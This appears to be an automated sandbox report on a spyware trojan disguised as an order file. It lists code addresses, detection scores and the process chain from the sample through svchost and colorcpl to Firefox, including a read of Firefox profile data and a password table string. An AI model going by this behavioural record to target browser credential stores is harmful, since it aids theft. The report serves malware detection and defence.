Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033001AA	1_2_033001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F81CC	1_2_032F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D2000	1_2_032D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240770	1_2_03240770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03264750	1_2_03264750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323C7C0	1_2_0323C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325C6E0	1_2_0325C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240535	1_2_03240535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03300591	1_2_03300591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E4420	1_2_032E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F2446	1_2_032F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EE4F6	1_2_032EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FAB40	1_2_032FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F6BD7	1_2_032F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323EA80	1_2_0323EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03256962	1_2_03256962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032429A0	1_2_032429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0330A9A6	1_2_0330A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324A840	1_2_0324A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03242840	1_2_03242840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032268B8	1_2_032268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0326E8F0	1_2_0326E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03282F28	1_2_03282F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03260F30	1_2_03260F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E2F30	1_2_032E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B4F40	1_2_032B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032BEFA0	1_2_032BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03232FC8	1_2_03232FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FEE26	1_2_032FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240E59	1_2_03240E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03252E90	1_2_03252E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FCE93	1_2_032FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FEEDB	1_2_032FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324AD00	1_2_0324AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DCD1F	1_2_032DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03258DBF	1_2_03258DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0323ADE0	1_2_0323ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03240C00	1_2_03240C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E0CB5	1_2_032E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03230CF2	1_2_03230CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F132D	1_2_032F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322D34C	1_2_0322D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0328739A	1_2_0328739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032452A0	1_2_032452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E12ED	1_2_032E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325D2F0	1_2_0325D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325B2C0	1_2_0325B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327516C	1_2_0327516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0322F172	1_2_0322F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0330B16B	1_2_0330B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0324B1B0	1_2_0324B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F70E9	1_2_032F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FF0E0	1_2_032FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EF0CC	1_2_032EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032470C0	1_2_032470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FF7B0	1_2_032FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03285630	1_2_03285630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F16CC	1_2_032F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F7571	1_2_032F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DD5B0	1_2_032DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033095C3	1_2_033095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FF43F	1_2_032FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03231460	1_2_03231460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFB76	1_2_032FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325FB80	1_2_0325FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B5BF0	1_2_032B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0327DBF9	1_2_0327DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B3A6C	1_2_032B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFA49	1_2_032FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F7A46	1_2_032F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032DDAAC	1_2_032DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03285AA0	1_2_03285AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032E1AA3	1_2_032E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032EDAC6	1_2_032EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032D5910	1_2_032D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03249950	1_2_03249950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325B950	1_2_0325B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032AD800	1_2_032AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032438E0	1_2_032438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFF09	1_2_032FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFFB1	1_2_032FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03241F92	1_2_03241F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03203FD2	1_2_03203FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03203FD5	1_2_03203FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03249EB0	1_2_03249EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F7D73	1_2_032F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03243D40	1_2_03243D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032F1D5A	1_2_032F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0325FDC0	1_2_0325FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032B9C32	1_2_032B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_032FFCF2	1_2_032FFCF2
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034C1B5C	5_2_034C1B5C
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034C3BA4	5_2_034C3BA4
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034C1BB4	5_2_034C1BB4
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034CC204	5_2_034CC204
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034C3984	5_2_034C3984
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034E2994	5_2_034E2994
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034C1D04	5_2_034C1D04
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034C1DCC	5_2_034C1DCC
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Code function: 5_2_034CA404	5_2_034CA404
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C4E4F6	6_2_04C4E4F6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C52446	6_2_04C52446
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C44420	6_2_04C44420
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C60591	6_2_04C60591
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA0535	6_2_04BA0535
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BBC6E0	6_2_04BBC6E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B9C7C0	6_2_04B9C7C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA0770	6_2_04BA0770
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BC4750	6_2_04BC4750
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C32000	6_2_04C32000
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C581CC	6_2_04C581CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C541A2	6_2_04C541A2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C601AA	6_2_04C601AA
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C28158	6_2_04C28158
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B90100	6_2_04B90100
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C3A118	6_2_04C3A118
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C202C0	6_2_04C202C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C40274	6_2_04C40274
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C603E6	6_2_04C603E6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BAE3F0	6_2_04BAE3F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5A352	6_2_04C5A352
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B90CF2	6_2_04B90CF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C40CB5	6_2_04C40CB5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA0C00	6_2_04BA0C00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BB8DBF	6_2_04BB8DBF
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B9ADE0	6_2_04B9ADE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BAAD00	6_2_04BAAD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C3CD1F	6_2_04C3CD1F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5EEDB	6_2_04C5EEDB
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BB2E90	6_2_04BB2E90
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5CE93	6_2_04C5CE93
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5EE26	6_2_04C5EE26
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA0E59	6_2_04BA0E59
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C1EFA0	6_2_04C1EFA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B92FC8	6_2_04B92FC8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C14F40	6_2_04C14F40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BC0F30	6_2_04BC0F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BE2F28	6_2_04BE2F28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C42F30	6_2_04C42F30
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B868B8	6_2_04B868B8
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BCE8F0	6_2_04BCE8F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BAA840	6_2_04BAA840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA2840	6_2_04BA2840
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA29A0	6_2_04BA29A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C6A9A6	6_2_04C6A9A6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BB6962	6_2_04BB6962
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B9EA80	6_2_04B9EA80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C56BD7	6_2_04C56BD7
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5AB40	6_2_04C5AB40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B91460	6_2_04B91460
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5F43F	6_2_04C5F43F
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C695C3	6_2_04C695C3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C3D5B0	6_2_04C3D5B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C57571	6_2_04C57571
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C516CC	6_2_04C516CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BE5630	6_2_04BE5630
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5F7B0	6_2_04C5F7B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C4F0CC	6_2_04C4F0CC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5F0E0	6_2_04C5F0E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C570E9	6_2_04C570E9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA70C0	6_2_04BA70C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BAB1B0	6_2_04BAB1B0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C6B16B	6_2_04C6B16B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B8F172	6_2_04B8F172
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BD516C	6_2_04BD516C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA52A0	6_2_04BA52A0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C412ED	6_2_04C412ED
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BBD2F0	6_2_04BBD2F0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BBB2C0	6_2_04BBB2C0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BE739A	6_2_04BE739A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5132D	6_2_04C5132D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B8D34C	6_2_04B8D34C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5FCF2	6_2_04C5FCF2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C19C32	6_2_04C19C32
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BBFDC0	6_2_04BBFDC0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C51D5A	6_2_04C51D5A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C57D73	6_2_04C57D73
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA3D40	6_2_04BA3D40
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA9EB0	6_2_04BA9EB0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA1F92	6_2_04BA1F92
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B63FD5	6_2_04B63FD5
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04B63FD2	6_2_04B63FD2
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5FFB1	6_2_04C5FFB1
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5FF09	6_2_04C5FF09
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA38E0	6_2_04BA38E0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C0D800	6_2_04C0D800
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C35910	6_2_04C35910
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BA9950	6_2_04BA9950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BBB950	6_2_04BBB950
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C4DAC6	6_2_04C4DAC6
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BE5AA0	6_2_04BE5AA0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C41AA3	6_2_04C41AA3
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C3DAAC	6_2_04C3DAAC
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C57A46	6_2_04C57A46
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5FA49	6_2_04C5FA49
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C13A6C	6_2_04C13A6C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C15BF0	6_2_04C15BF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BBFB80	6_2_04BBFB80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04BDDBF9	6_2_04BDDBF9
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_04C5FB76	6_2_04C5FB76
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029C1C80	6_2_029C1C80
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029BCAE0	6_2_029BCAE0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029BAE60	6_2_029BAE60
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029BAF28	6_2_029BAF28
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029BAD10	6_2_029BAD10
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029BCD00	6_2_029BCD00
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029C5360	6_2_029C5360
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029C3560	6_2_029C3560
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_029DBAF0	6_2_029DBAF0
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_049BE4A4	6_2_049BE4A4
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_049BE60C	6_2_049BE60C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_049BE388	6_2_049BE388
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_049BE83C	6_2_049BE83C
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: 6_2_049BD908	6_2_049BD908

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03287E54 appears 107 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03275130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0322B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 032BF290 appears 103 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04C1F290 appears 103 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04BD5130 appears 58 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04BE7E54 appears 107 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04B8B970 appears 262 times
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: String function: 04C0EA12 appears 86 times

Source: New order BPD-003777.exe, 00000000.00000003.1776602406.000000000408D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs New order BPD-003777.exe
Source: New order BPD-003777.exe, 00000000.00000003.1775001851.0000000003BA3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs New order BPD-003777.exe

Source: New order BPD-003777.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@9/9

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002F37B5 GetLastError,FormatMessageW,

0_2_002F37B5

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002ED4DC CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_002ED4DC

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Code function: 0_2_002842A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_002842A2

Source: C:\Users\user\Desktop\New order BPD-003777.exe

File created: C:\Users\user\AppData\Local\Temp\proximobuccal

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\New order BPD-003777.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: colorcpl.exe, 00000006.00000002.3628717504.0000000002E38000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000006.00000003.2451871716.0000000002E38000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: New order BPD-003777.exe	Virustotal: Detection: 39%
Source: New order BPD-003777.exe	ReversingLabs: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\New order BPD-003777.exe "C:\Users\user\Desktop\New order BPD-003777.exe"
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\New order BPD-003777.exe"
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\New order BPD-003777.exe"	Jump to behavior
Source: C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe	Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\New order BPD-003777.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
